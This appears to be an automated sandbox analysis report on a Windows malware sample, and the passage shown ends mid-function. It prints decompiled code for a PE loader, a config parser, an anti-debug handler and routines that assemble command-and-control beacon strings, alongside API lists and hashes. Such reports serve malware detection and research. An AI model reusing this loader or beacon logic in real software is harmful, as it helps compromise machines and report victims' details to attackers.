Instruction Fuzzy Hash: 72A022A288830C23F00030C23C03B023A0C0300AB8F080030EF0E08A823CC3B02000E3

Uniqueness

Uniqueness Score: -1.00%

Function 02F11444, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E02F11444(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x2f141cc;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x2f141cc - 0x63698bc4 &  !( *0x2f141cc - 0x63698bc4);
				_t18 = E02F11060( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x2f141cc - 0x63698bc4 &  !( *0x2f141cc - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x2f141cc - 0x63698bc4 &  !( *0x2f141cc - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E02F11A5A(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E02F11F7C(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E02F1126D(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E02F1142F(_t42);
					L8:
					return _t29;
				}
			}

0x02f1144c
0x02f1144e
0x02f1146a
0x02f1147b
0x02f11482
0x02f114e0
0x00000000
0x02f11484
0x02f11484
0x02f1148e
0x02f11492
0x02f11497
0x02f1149a
0x02f1149f
0x02f114a3
0x02f114a8
0x02f114ad
0x02f114b1
0x02f114b6
0x02f114b7
0x02f114bb
0x02f114c0
0x02f114c8
0x02f114c8
0x02f114c0
0x02f114b1
0x02f114a3
0x02f114ca
0x02f114d3
0x02f114d7
0x02f114e1
0x02f114e7
0x02f114e7

APIs

Part of subcall function 02F11060: GetModuleHandleA.KERNEL32(?,00000020), ref: 02F11084
Part of subcall function 02F11060: GetProcAddress.KERNEL32(00000000,?), ref: 02F110A6
Part of subcall function 02F11060: GetProcAddress.KERNEL32(00000000,?), ref: 02F110BC
Part of subcall function 02F11060: GetProcAddress.KERNEL32(00000000,?), ref: 02F110D2
Part of subcall function 02F11060: GetProcAddress.KERNEL32(00000000,?), ref: 02F110E8
Part of subcall function 02F11060: GetProcAddress.KERNEL32(00000000,?), ref: 02F110FE

Part of subcall function 02F11A5A: memcpy.NTDLL(?,?,?,?,?,?,?,?,02F1148E,?), ref: 02F11A87
Part of subcall function 02F11A5A: memcpy.NTDLL(?,?,?), ref: 02F11ABA

Part of subcall function 02F11F7C: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 02F11FB4

Part of subcall function 02F1126D: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 02F112A6
Part of subcall function 02F1126D: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 02F1131B
Part of subcall function 02F1126D: GetLastError.KERNEL32 ref: 02F11321

GetLastError.KERNEL32 ref: 02F114C2

Memory Dump Source

Source File: 00000007.00000002.480547433.0000000002F11000.00000020.00020000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000007.00000002.480531790.0000000002F10000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480565310.0000000002F13000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480582200.0000000002F15000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.480603413.0000000002F16000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: c12829211222118e92c3ebd3c95bb6c8e89c7ae869bc034f9a5990cf5143cca1
Instruction ID: 448822d50c1649e40413f5ca6bce98188fa3372ca1d08ebcef164229771fa249
Opcode Fuzzy Hash: c12829211222118e92c3ebd3c95bb6c8e89c7ae869bc034f9a5990cf5143cca1
Instruction Fuzzy Hash: 39117136B003056BD720ABE8CD80FAB77FCEF497847404459EB09A7140EBB0ED068BA0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 03292206, Relevance: 10.7, APIs: 7, Instructions: 204
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E03292206(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t26;
				signed int _t31;
				signed int _t37;
				char* _t43;
				char* _t44;
				char* _t45;
				char* _t46;
				char* _t47;
				void* _t48;
				void* _t49;
				intOrPtr _t50;
				signed int _t56;
				void* _t58;
				void* _t59;
				signed int _t61;
				signed int _t65;
				signed int _t69;
				signed int _t73;
				signed int _t77;
				signed int _t81;
				void* _t86;
				intOrPtr _t102;

				_t87 = __ecx;
				_t26 =  *0x329a2d0; // 0x63699bc3
				if(E03291BCB( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x110) {
					 *0x329a324 = _v8;
				}
				_t31 =  *0x329a2d0; // 0x63699bc3
				if(E03291BCB( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
					_v12 = 2;
					L50:
					return _v12;
				}
				_t37 =  *0x329a2d0; // 0x63699bc3
				if(E03291BCB( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
					L48:
					HeapFree( *0x329a290, 0, _v16);
					goto L50;
				} else {
					_t86 = _v12;
					if(_t86 == 0) {
						_t43 = 0;
					} else {
						_t81 =  *0x329a2d0; // 0x63699bc3
						_t43 = E032938CE(_t87, _t86, _t81 ^ 0x724e87bc);
					}
					if(_t43 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
							 *0x329a298 = _v8;
						}
					}
					if(_t86 == 0) {
						_t44 = 0;
					} else {
						_t77 =  *0x329a2d0; // 0x63699bc3
						_t44 = E032938CE(_t87, _t86, _t77 ^ 0x2b40cc40);
					}
					if(_t44 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
							 *0x329a29c = _v8;
						}
					}
					if(_t86 == 0) {
						_t45 = 0;
					} else {
						_t73 =  *0x329a2d0; // 0x63699bc3
						_t45 = E032938CE(_t87, _t86, _t73 ^ 0x3b27c2e6);
					}
					if(_t45 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x329a2a0 = _v8;
						}
					}
					if(_t86 == 0) {
						_t46 = 0;
					} else {
						_t69 =  *0x329a2d0; // 0x63699bc3
						_t46 = E032938CE(_t87, _t86, _t69 ^ 0x0602e249);
					}
					if(_t46 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x329a004 = _v8;
						}
					}
					if(_t86 == 0) {
						_t47 = 0;
					} else {
						_t65 =  *0x329a2d0; // 0x63699bc3
						_t47 = E032938CE(_t87, _t86, _t65 ^ 0x3603764c);
					}
					if(_t47 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x329a02c = _v8;
						}
					}
					if(_t86 == 0) {
						_t48 = 0;
					} else {
						_t61 =  *0x329a2d0; // 0x63699bc3
						_t48 = E032938CE(_t87, _t86, _t61 ^ 0x2cc1f2fd);
					}
					if(_t48 != 0) {
						_push(_t48);
						_t58 = 0x10;
						_t59 = E03293E49(_t58);
						if(_t59 != 0) {
							_push(_t59);
							E032950DF();
						}
					}
					if(_t86 == 0) {
						_t49 = 0;
					} else {
						_t56 =  *0x329a2d0; // 0x63699bc3
						_t49 = E032938CE(_t87, _t86, _t56 ^ 0xb30fc035);
					}
					if(_t49 != 0 && E03293E49(0, _t49) != 0) {
						_t102 =  *0x329a37c; // 0x53e9630
						E032910DD(_t102 + 4, _t54);
					}
					_t50 =  *0x329a2d4; // 0x214d5a8
					_t20 = _t50 + 0x329b252; // 0x53e87fa
					_t21 = _t50 + 0x329b7b5; // 0x6976612e
					 *0x329a320 = _t20;
					 *0x329a390 = _t21;
					HeapFree( *0x329a290, 0, _t86);
					_v12 = 0;
					goto L48;
				}
			}

0x03292206
0x03292209
0x03292229
0x03292237
0x03292237
0x0329223c
0x03292256
0x0329242a
0x03292431
0x03292438
0x03292438
0x0329225c
0x03292278
0x03292418
0x03292422
0x00000000
0x0329227e
0x0329227e
0x03292283
0x03292299
0x03292285
0x03292285
0x03292292
0x03292292
0x032922a3
0x032922a5
0x032922af
0x032922b4
0x032922b4
0x032922af
0x032922bb
0x032922d1
0x032922bd
0x032922bd
0x032922ca
0x032922ca
0x032922d5
0x032922d7
0x032922e1
0x032922e6
0x032922e6
0x032922e1
0x032922ed
0x03292303
0x032922ef
0x032922ef
0x032922fc
0x032922fc
0x03292307
0x03292309
0x03292313
0x03292318
0x03292318
0x03292313
0x0329231f
0x03292335
0x03292321
0x03292321
0x0329232e
0x0329232e
0x03292339
0x0329233b
0x03292345
0x0329234a
0x0329234a
0x03292345
0x03292351
0x03292367
0x03292353
0x03292353
0x03292360
0x03292360
0x0329236b
0x0329236d
0x03292377
0x0329237c
0x0329237c
0x03292377
0x03292383
0x03292399
0x03292385
0x03292385
0x03292392
0x03292392
0x0329239d
0x0329239f
0x032923a2
0x032923a3
0x032923aa
0x032923ac
0x032923ad
0x032923ad
0x032923aa
0x032923b4
0x032923ca
0x032923b6
0x032923b6
0x032923c3
0x032923c3
0x032923ce
0x032923dc
0x032923e6
0x032923e6
0x032923eb
0x032923f1
0x032923fe
0x03292404
0x0329240a
0x0329240f
0x03292415
0x00000000
0x03292415

APIs

StrToIntExA.SHLWAPI(00000000,00000000,032955D3,?,032955D3,63699BC3,?,?,63699BC3,032955D3,?,63699BC3,E8FA7DD7,0329A00C,7742C740), ref: 032922AB
StrToIntExA.SHLWAPI(00000000,00000000,032955D3,?,032955D3,63699BC3,?,?,63699BC3,032955D3,?,63699BC3,E8FA7DD7,0329A00C,7742C740), ref: 032922DD
StrToIntExA.SHLWAPI(00000000,00000000,032955D3,?,032955D3,63699BC3,?,?,63699BC3,032955D3,?,63699BC3,E8FA7DD7,0329A00C,7742C740), ref: 0329230F
StrToIntExA.SHLWAPI(00000000,00000000,032955D3,?,032955D3,63699BC3,?,?,63699BC3,032955D3,?,63699BC3,E8FA7DD7,0329A00C,7742C740), ref: 03292341
StrToIntExA.SHLWAPI(00000000,00000000,032955D3,?,032955D3,63699BC3,?,?,63699BC3,032955D3,?,63699BC3,E8FA7DD7,0329A00C,7742C740), ref: 03292373
HeapFree.KERNEL32(00000000,?,?,032955D3,63699BC3,?,?,63699BC3,032955D3,?,63699BC3,E8FA7DD7,0329A00C,7742C740), ref: 0329240F
HeapFree.KERNEL32(00000000,?,?,032955D3,63699BC3,?,?,63699BC3,032955D3,?,63699BC3,E8FA7DD7,0329A00C,7742C740), ref: 03292422

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 4e627c690974fa44b4a20ebc2d414d3f309300950e19e04730d9535bd24e8193
Instruction ID: 8c2bfaf998c59692c9dcb3fa8e76df9524534078d0a00b4d1aedf5b3b5de2dc5
Opcode Fuzzy Hash: 4e627c690974fa44b4a20ebc2d414d3f309300950e19e04730d9535bd24e8193
Instruction Fuzzy Hash: 80614375E20309FBEF11EBB5E98CC5FB7A9AB4C700B284D57A501DB104EA71D9818B64

Uniqueness

Uniqueness Score: -1.00%

Function 02F4B8F0, Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 02F551CB
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 02F551E2
UnhandledExceptionFilter.KERNEL32(02F7CAC0), ref: 02F551ED
GetCurrentProcess.KERNEL32(C0000409), ref: 02F5520B
TerminateProcess.KERNEL32(00000000), ref: 02F55212

Memory Dump Source

Source File: 00000007.00000002.480637946.0000000002F1E000.00000020.00020000.sdmp, Offset: 02F1E000, based on PE: false

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 6e19467e0422b8de3ae94360f86481603c7923853e1d20c4f07d6db6a9c5a5cd
Instruction ID: 626b12d18d611e0c98e4dceea5b91b3d624ff12114a2c6d668a5594c0c9fb6ce
Opcode Fuzzy Hash: 6e19467e0422b8de3ae94360f86481603c7923853e1d20c4f07d6db6a9c5a5cd
Instruction Fuzzy Hash: C221F0B4C81618EBD350DF15F844A54FBA0BB0ABC4F40895AEA1983211E7725A658F59

Uniqueness

Uniqueness Score: -1.00%

Function 03296EFC, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 220
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E03296EFC(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v24;
				intOrPtr _v40;
				void* __ecx;
				void* __edi;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				int _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t52;
				intOrPtr _t55;
				intOrPtr _t56;
				intOrPtr _t62;
				intOrPtr _t66;
				intOrPtr* _t68;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t84;
				int _t87;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t92;
				int _t95;
				void* _t98;
				void* _t99;
				void* _t103;
				intOrPtr _t105;
				long _t107;
				intOrPtr _t108;
				intOrPtr* _t109;
				long _t110;
				int _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;
				void* _t120;
				void* _t121;

				_t103 = __edx;
				_t110 = __eax;
				_v8 = 8;
				_t117 = RtlAllocateHeap( *0x329a290, 0, 0x800);
				if(_t117 != 0) {
					if(_t110 == 0) {
						_t110 = GetTickCount();
					}
					_t31 =  *0x329a018; // 0x44296a3b
					asm("bswap eax");
					_t32 =  *0x329a014; // 0x5cb11ae7
					asm("bswap eax");
					_t33 =  *0x329a010; // 0x15dc9586
					asm("bswap eax");
					_t34 =  *0x329a00c; // 0x8e03bf7
					asm("bswap eax");
					_t35 =  *0x329a2d4; // 0x214d5a8
					_t2 = _t35 + 0x329b613; // 0x74666f73
					_t111 = wsprintfA(_t117, _t2, 2, 0x3d15c, _t34, _t33, _t32, _t31,  *0x329a02c,  *0x329a004, _t110);
					_t38 = E03296A09();
					_t39 =  *0x329a2d4; // 0x214d5a8
					_t3 = _t39 + 0x329b653; // 0x74707526
					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
					_t120 = _t118 + 0x38;
					_t112 = _t111 + _t42;
					if(_a12 != 0) {
						_t92 =  *0x329a2d4; // 0x214d5a8
						_t7 = _t92 + 0x329b65e; // 0x732526
						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
						_t120 = _t120 + 0xc;
						_t112 = _t112 + _t95;
					}
					_t43 = E03295040(_t99);
					_t44 =  *0x329a2d4; // 0x214d5a8
					_t9 = _t44 + 0x329b302; // 0x6d697426
					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
					_t48 =  *0x329a2d4; // 0x214d5a8
					_t11 = _t48 + 0x329b2d7; // 0x74636126
					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
					_t52 =  *0x329a32c; // 0x53e95b0
					_t121 = _t120 + 0x1c;
					if(_t52 != 0) {
						_t88 =  *0x329a2d4; // 0x214d5a8
						_t13 = _t88 + 0x329b676; // 0x73797326
						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t91;
					}
					_t105 =  *0x329a37c; // 0x53e9630
					_a28 = E03292885(0x329a00a, _t105 + 4);
					_t55 =  *0x329a31c; // 0x53e95e0
					_t107 = 0;
					if(_t55 != 0) {
						_t84 =  *0x329a2d4; // 0x214d5a8
						_t16 = _t84 + 0x329b8da; // 0x3d736f26
						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
						_t121 = _t121 + 0xc;
						_t114 = _t114 + _t87;
					}
					_t56 =  *0x329a318; // 0x0
					if(_t56 != _t107) {
						_t81 =  *0x329a2d4; // 0x214d5a8
						_t18 = _t81 + 0x329b8b1; // 0x3d706926
						wsprintfA(_t114 + _t117, _t18, _t56);
					}
					if(_a28 != _t107) {
						_t98 = RtlAllocateHeap( *0x329a290, _t107, 0x800);
						if(_t98 != _t107) {
							E03292DD0(GetTickCount());
							_t62 =  *0x329a37c; // 0x53e9630
							__imp__(_t62 + 0x40);
							asm("lock xadd [eax], ecx");
							_t66 =  *0x329a37c; // 0x53e9630
							__imp__(_t66 + 0x40);
							_t68 =  *0x329a37c; // 0x53e9630
							_t115 = E0329624D(1, _t103, _t117,  *_t68);
							asm("lock xadd [eax], ecx");
							if(_t115 != _t107) {
								StrTrimA(_t115, 0x32992ac);
								_push(_t115);
								_t108 = E032921C1();
								_v4 = _t108;
								if(_t108 != 0) {
									 *_t115 = 0;
									__imp__(_t98, _a8);
									_t109 = __imp__;
									 *_t109(_t98, _t108);
									 *_t109(_t98, _t115);
									_t78 = E03291032(0xffffffffffffffff, _t98, _v12, _v8);
									_v40 = _t78;
									if(_t78 != 0 && _t78 != 0x10d2) {
										E03291492();
									}
									HeapFree( *0x329a290, 0, _v24);
								}
								HeapFree( *0x329a290, 0, _t115);
								_t107 = 0;
							}
							HeapFree( *0x329a290, _t107, _t98);
						}
						HeapFree( *0x329a290, _t107, _a20);
					}
					HeapFree( *0x329a290, _t107, _t117);
				}
				return _v16;
			}

0x03296efc
0x03296f10
0x03296f12
0x03296f20
0x03296f24
0x03296f2c
0x03296f34
0x03296f34
0x03296f36
0x03296f42
0x03296f51
0x03296f56
0x03296f59
0x03296f5e
0x03296f61
0x03296f66
0x03296f69
0x03296f75
0x03296f82
0x03296f84
0x03296f8a
0x03296f8f
0x03296f9a
0x03296f9c
0x03296f9f
0x03296fa5
0x03296fa7
0x03296fb0
0x03296fbb
0x03296fbd
0x03296fc0
0x03296fc0
0x03296fc2
0x03296fc9
0x03296fce
0x03296fdb
0x03296fdd
0x03296fe2
0x03296ff0
0x03296ff2
0x03296ff7
0x03296ffc
0x03296fff
0x03297004
0x0329700f
0x03297011
0x03297014
0x03297014
0x03297016
0x03297029
0x0329702d
0x03297032
0x03297036
0x03297039
0x0329703e
0x03297049
0x0329704b
0x0329704e
0x0329704e
0x03297050
0x03297057
0x0329705a
0x0329705f
0x03297069
0x0329706b
0x03297072
0x0329708a
0x0329708e
0x0329709a
0x0329709f
0x032970a8
0x032970b9
0x032970bd
0x032970c6
0x032970cc
0x032970d9
0x032970e6
0x032970ec
0x032970f4
0x032970fa
0x03297100
0x03297104
0x03297108
0x0329710e
0x03297112
0x03297119
0x03297120
0x03297124
0x0329712f
0x03297136
0x0329713a
0x03297143
0x03297143
0x03297154
0x03297154
0x03297163
0x03297169
0x03297169
0x03297173
0x03297173
0x03297184
0x03297184
0x03297192
0x03297192
0x032971a2

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 03296F1A
GetTickCount.KERNEL32 ref: 03296F2E
wsprintfA.USER32 ref: 03296F7D
wsprintfA.USER32 ref: 03296F9A
wsprintfA.USER32 ref: 03296FBB
wsprintfA.USER32 ref: 03296FD9
wsprintfA.USER32 ref: 03296FEE
wsprintfA.USER32 ref: 0329700F
wsprintfA.USER32 ref: 03297049
wsprintfA.USER32 ref: 03297069
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 03297084
GetTickCount.KERNEL32 ref: 03297094
RtlEnterCriticalSection.NTDLL(053E95F0), ref: 032970A8
RtlLeaveCriticalSection.NTDLL(053E95F0), ref: 032970C6

Part of subcall function 0329624D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,032970D9,00000000,053E9630), ref: 03296278
Part of subcall function 0329624D: lstrlen.KERNEL32(00000000,?,00000000,032970D9,00000000,053E9630), ref: 03296280
Part of subcall function 0329624D: strcpy.NTDLL ref: 03296297
Part of subcall function 0329624D: lstrcat.KERNEL32(00000000,00000000), ref: 032962A2
Part of subcall function 0329624D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,032970D9,?,00000000,032970D9,00000000,053E9630), ref: 032962BF

StrTrimA.SHLWAPI(00000000,032992AC,00000000,053E9630), ref: 032970F4

Part of subcall function 032921C1: lstrlen.KERNEL32(053E87FA,00000000,00000000,00000000,03297100,00000000), ref: 032921D1
Part of subcall function 032921C1: lstrlen.KERNEL32(?), ref: 032921D9
Part of subcall function 032921C1: lstrcpy.KERNEL32(00000000,053E87FA), ref: 032921ED
Part of subcall function 032921C1: lstrcat.KERNEL32(00000000,?), ref: 032921F8

lstrcpy.KERNEL32(00000000,?), ref: 03297112
lstrcat.KERNEL32(00000000,00000000), ref: 03297120
lstrcat.KERNEL32(00000000,00000000), ref: 03297124
HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 03297154
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 03297163
HeapFree.KERNEL32(00000000,00000000,00000000,053E9630), ref: 03297173
HeapFree.KERNEL32(00000000,?), ref: 03297184
HeapFree.KERNEL32(00000000,00000000), ref: 03297192

Strings

;j)D, xrefs: 03296F36

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: wsprintf$Heap$Free$lstrcatlstrlen$AllocateCountCriticalSectionTickTrimlstrcpy$EnterLeavestrcpy
String ID: ;j)D
API String ID: 1837416118-1993995304
Opcode ID: 428b5a280e588fd9f5aed65288c71ad069aeae8701d80512c779044a01b92cbd
Instruction ID: 57b0024ef142d0dbcded6e5096e64621172b3b2746cdcfa051cf29c0ffca896a
Opcode Fuzzy Hash: 428b5a280e588fd9f5aed65288c71ad069aeae8701d80512c779044a01b92cbd
Instruction Fuzzy Hash: 53718B71510305AFDB21EB68FC8CE5A77ECFB8C710B06851BF919C7204E63AA8559B64

Uniqueness

Uniqueness Score: -1.00%

Function 032946D1, Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 262
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E032946D1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a8, char** _a12, int* _a16, signed int _a20) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* __ebx;
				void* __edi;
				long _t63;
				intOrPtr _t64;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				void* _t76;
				intOrPtr _t77;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t88;
				void* _t91;
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr* _t101;
				void* _t107;
				intOrPtr _t111;
				signed int _t115;
				char** _t117;
				int _t120;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr _t132;
				intOrPtr _t135;
				int _t138;
				intOrPtr _t139;
				int _t142;
				void* _t143;
				void* _t144;
				void* _t154;
				int _t157;
				void* _t158;
				void* _t159;
				void* _t160;
				intOrPtr _t161;
				void* _t163;
				long _t167;
				intOrPtr* _t168;
				intOrPtr* _t171;
				void* _t172;
				void* _t174;
				void* _t175;
				void* _t180;

				_t154 = __edx;
				_t144 = __ecx;
				_t63 = __eax;
				_t143 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t63 = GetTickCount();
				}
				_t64 =  *0x329a018; // 0x44296a3b
				asm("bswap eax");
				_t65 =  *0x329a014; // 0x5cb11ae7
				asm("bswap eax");
				_t66 =  *0x329a010; // 0x15dc9586
				asm("bswap eax");
				_t67 =  *0x329a00c; // 0x8e03bf7
				asm("bswap eax");
				_t68 =  *0x329a2d4; // 0x214d5a8
				_t3 = _t68 + 0x329b613; // 0x74666f73
				_t157 = wsprintfA(_t143, _t3, 3, 0x3d15c, _t67, _t66, _t65, _t64,  *0x329a02c,  *0x329a004, _t63);
				_t71 = E03296A09();
				_t72 =  *0x329a2d4; // 0x214d5a8
				_t4 = _t72 + 0x329b653; // 0x74707526
				_t75 = wsprintfA(_t157 + _t143, _t4, _t71);
				_t174 = _t172 + 0x38;
				_t158 = _t157 + _t75;
				if(_a8 != 0) {
					_t139 =  *0x329a2d4; // 0x214d5a8
					_t8 = _t139 + 0x329b65e; // 0x732526
					_t142 = wsprintfA(_t158 + _t143, _t8, _a8);
					_t174 = _t174 + 0xc;
					_t158 = _t158 + _t142;
				}
				_t76 = E03295040(_t144);
				_t77 =  *0x329a2d4; // 0x214d5a8
				_t10 = _t77 + 0x329b302; // 0x6d697426
				_t159 = _t158 + wsprintfA(_t158 + _t143, _t10, _t76, _t154);
				_t81 =  *0x329a2d4; // 0x214d5a8
				_t12 = _t81 + 0x329b7aa; // 0x53e8d52
				_t180 = _a4 - _t12;
				_t14 = _t81 + 0x329b2d7; // 0x74636126
				_t156 = 0 | _t180 == 0x00000000;
				_t160 = _t159 + wsprintfA(_t159 + _t143, _t14, _t180 == 0);
				_t85 =  *0x329a31c; // 0x53e95e0
				_t175 = _t174 + 0x1c;
				if(_t85 != 0) {
					_t135 =  *0x329a2d4; // 0x214d5a8
					_t18 = _t135 + 0x329b8da; // 0x3d736f26
					_t138 = wsprintfA(_t160 + _t143, _t18, _t85);
					_t175 = _t175 + 0xc;
					_t160 = _t160 + _t138;
				}
				_t86 =  *0x329a32c; // 0x53e95b0
				if(_t86 != 0) {
					_t132 =  *0x329a2d4; // 0x214d5a8
					_t20 = _t132 + 0x329b676; // 0x73797326
					wsprintfA(_t160 + _t143, _t20, _t86);
					_t175 = _t175 + 0xc;
				}
				_t161 =  *0x329a37c; // 0x53e9630
				_t88 = E03292885(0x329a00a, _t161 + 4);
				_t167 = 0;
				_v12 = _t88;
				if(_t88 == 0) {
					L28:
					HeapFree( *0x329a290, _t167, _t143);
					return _a20;
				} else {
					_t91 = RtlAllocateHeap( *0x329a290, 0, 0x800);
					_a8 = _t91;
					if(_t91 == 0) {
						L27:
						HeapFree( *0x329a290, _t167, _v12);
						goto L28;
					}
					E03292DD0(GetTickCount());
					_t95 =  *0x329a37c; // 0x53e9630
					__imp__(_t95 + 0x40);
					asm("lock xadd [eax], ecx");
					_t99 =  *0x329a37c; // 0x53e9630
					__imp__(_t99 + 0x40);
					_t101 =  *0x329a37c; // 0x53e9630
					_t163 = E0329624D(1, _t156, _t143,  *_t101);
					_v20 = _t163;
					asm("lock xadd [eax], ecx");
					if(_t163 == 0) {
						L26:
						HeapFree( *0x329a290, _t167, _a8);
						goto L27;
					}
					StrTrimA(_t163, 0x32992ac);
					_push(_t163);
					_t107 = E032921C1();
					_v8 = _t107;
					if(_t107 == 0) {
						L25:
						HeapFree( *0x329a290, _t167, _t163);
						goto L26;
					}
					 *_t163 = 0;
					__imp__(_a8, _v12);
					_t168 = __imp__;
					 *_t168(_a8, _v8);
					_t111 = E03294AA6( *_t168(_a8, _t163), _a8);
					_a4 = _t111;
					if(_t111 == 0) {
						_a20 = 8;
						L23:
						E03291492();
						L24:
						HeapFree( *0x329a290, 0, _v8);
						_t167 = 0;
						goto L25;
					}
					_t115 = E032926C9(_t143, 0xffffffffffffffff, _t163,  &_v16);
					_a20 = _t115;
					if(_t115 == 0) {
						_t171 = _v16;
						_a20 = E0329161A(_t171, _a4, _a12, _a16);
						_t123 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
						_t125 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t125 + 8))(_t125);
						_t127 =  *((intOrPtr*)(_t171 + 4));
						 *((intOrPtr*)( *_t127 + 8))(_t127);
						_t129 =  *_t171;
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						E032950CA(_t171);
					}
					if(_a20 != 0x10d2) {
						L18:
						if(_a20 == 0) {
							_t117 = _a12;
							if(_t117 != 0) {
								_t164 =  *_t117;
								_t169 =  *_a16;
								wcstombs( *_t117,  *_t117,  *_a16);
								_t120 = E0329580E(_t164, _t164, _t169 >> 1);
								_t163 = _v20;
								 *_a16 = _t120;
							}
						}
						goto L21;
					} else {
